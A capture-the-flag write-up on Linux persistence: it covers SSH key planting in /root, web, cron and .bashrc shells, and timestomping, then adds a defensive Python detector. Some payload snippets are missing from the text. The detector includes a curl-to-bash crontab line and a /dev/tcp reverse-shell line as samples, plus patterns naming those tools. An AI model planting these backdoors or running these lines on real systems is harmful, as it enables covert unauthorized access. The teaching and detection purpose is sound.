Linux Backdoors
Date: 17 May 2021
Author: Dhilip Sanjay S
This is a writeup of the corresponding TryHackMe room.
Introduction
A backdoor is simply something we set up to ensure persistent access to the machine.
So even if the machine is rebooted, shut down or otherwise disrupted, we would still be able to get back in.
SSH Backdoors
The SSH backdoor essentially consists of leaving our SSH public key in some user's home directory. Usually the user would be root, as it is the user with the highest privileges.
Steps:
1. Run ssh-keygen on your local machine.
2. Add the public key to authorized_keys in the /root/.ssh directory of the target machine.
3. Ensure proper permissions: chmod 600 ~/.ssh/authorized_keys
Now that we have left our backdoor, we can simply log in as root using the following commands:
chmod 600 id_rsa
(This is necessary because otherwise ssh will complain that the permissions on the key are not secure enough.)
ssh -i id_rsa root@ip
This logs us into our desired machine.
Note: This backdoor isn't hidden at all. Anybody with the right permissions could remove our SSH public key, or the authorized_keys file entirely.
In what directory do we place our keys?
Answer: .ssh
What flag in ssh do we use to show our private key?
Answer: -i
PHP Backdoors
If you get root access on a Linux host, you will most likely search for credentials and/or any other useful information in the web root. The web root is usually located in /var/www/html. You can create a PHP file with any name and put the following piece of code in it:
Notice that we are using $_REQUEST['cmd'], which means that the parameter can be passed either in the GET query string or in POST data. To access the shell:
Here are some ways that we could make this backdoor a little more hidden:
CronJob Backdoors
View the contents of /etc/crontab:
This represents all the tasks that are scheduled to run at some time on your machine.
In the example above, you can see that there is a "*" symbol under the "h" column. This means that the task runs every hour.
Add this line to our crontab file ("*" in every field means our task will run every minute of every hour of every day, etc.):
The contents of the shell file:
We would have to run an HTTP server serving our shell, using:
python3 -m http.server 8080
Don't forget to listen on your specified port with:
nc -lvnp <port>
Note: This backdoor isn't really hidden either, because anyone can see it just by looking inside /etc/crontab.
What does the letter "m" mean in cronjobs?
Answer: minute
What does the letter "h" mean in cronjobs?
Answer: hour
.bashrc Backdoors
If a user has bash as their login shell, the .bashrc file in their home directory is executed when an interactive session is launched.
You could simply run this command to include your reverse shell in their .bashrc:
Note:
One important thing is to always have your nc listener ready, as you don't know when the user will log on.
This attack is very sneaky, as nobody really thinks to check their .bashrc file.
On the other hand, you can't know whether any of the users will actually log in to the system, so you might end up waiting a long time.
pam_unix.so Backdoors
pam_unix.so is one of many files in Linux that are responsible for authentication.
Making Detection More Difficult
To make detection of all of these backdoors more difficult, one can adjust the modification time of the created files (this is what the ls command shows) to a past date:
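From the defender's side, each of the mechanisms above leaves something on disk to audit. The script below is an added example, not part of the TryHackMe room: it flags crontab or .bashrc lines that fetch-and-pipe to a shell or open a reverse connection, lists authorized_keys entries outside an approved set, and catches backdated files by comparing mtime with ctime (touch -d rewrites mtime only; ctime is set by the kernel and cannot be backdated from userland). The patterns, file contents and key blobs are constructed samples.

```python
import os
import re
import tempfile
import time

# Lines in a crontab or rc file that fetch-and-pipe to a shell or open a
# reverse connection; patterns are assumptions here, tune them for your hosts.
SUSPICIOUS = re.compile(r"(curl|wget)[^|]*\|\s*(ba)?sh\b|bash -i|\bnc\b.*\s-e\s|/dev/tcp/")

def suspicious_lines(text: str) -> list[str]:
    """Return the lines of a crontab or ~/.bashrc that match SUSPICIOUS."""
    return [ln for ln in text.splitlines() if SUSPICIOUS.search(ln)]

def unknown_keys(authorized_keys: str, approved: set[str]) -> list[str]:
    """Return key blobs in an authorized_keys file that are not in the approved set."""
    found = []
    for ln in authorized_keys.splitlines():
        parts = ln.split()
        if not parts or parts[0].startswith("#"):
            continue
        # Options (from=, command=, ...) may precede the key type, so locate the type field first.
        for i, p in enumerate(parts[:-1]):
            if p.startswith(("ssh-", "ecdsa-", "sk-")):
                if parts[i + 1] not in approved:
                    found.append(parts[i + 1])
                break
    return found

def timestomped(path: str, slack: float = 60.0) -> bool:
    """True when mtime is much older than ctime: touch -d changes the former only."""
    st = os.stat(path)
    return st.st_ctime - st.st_mtime > slack

def demo_timestomp() -> bool:
    """Create a temp file, backdate its mtime by a year (what touch -d does) and check."""
    fd, path = tempfile.mkstemp()
    os.close(fd)
    past = time.time() - 365 * 86400
    os.utime(path, (past, past))  # rewrites atime/mtime; the kernel bumps ctime to now
    try:
        return timestomped(path)
    finally:
        os.remove(path)

# Constructed samples, not captured from a real host.
CRONTAB = "17 * * * * root run-parts /etc/cron.hourly\n* * * * * root curl http://10.0.0.5:8080/shell.sh | bash\n"
BASHRC = "alias ll='ls -alF'\nbash -i >& /dev/tcp/10.0.0.5/4444 0>&1\n"
AUTH_KEYS = "ssh-ed25519 AAAAC3-constructed-known admin@laptop\nfrom=\"10.*\" ssh-rsa AAAAB3-constructed-unknown x\n"
APPROVED = {"AAAAC3-constructed-known"}
```

Run the checks against the real /etc/crontab, /etc/cron.d/*, each user's .bashrc and authorized_keys, and against recently changed files under /var/www and /etc/pam.d; an mtime/ctime gap is a strong signal but a normal package upgrade can produce one too, so treat it as a lead rather than proof.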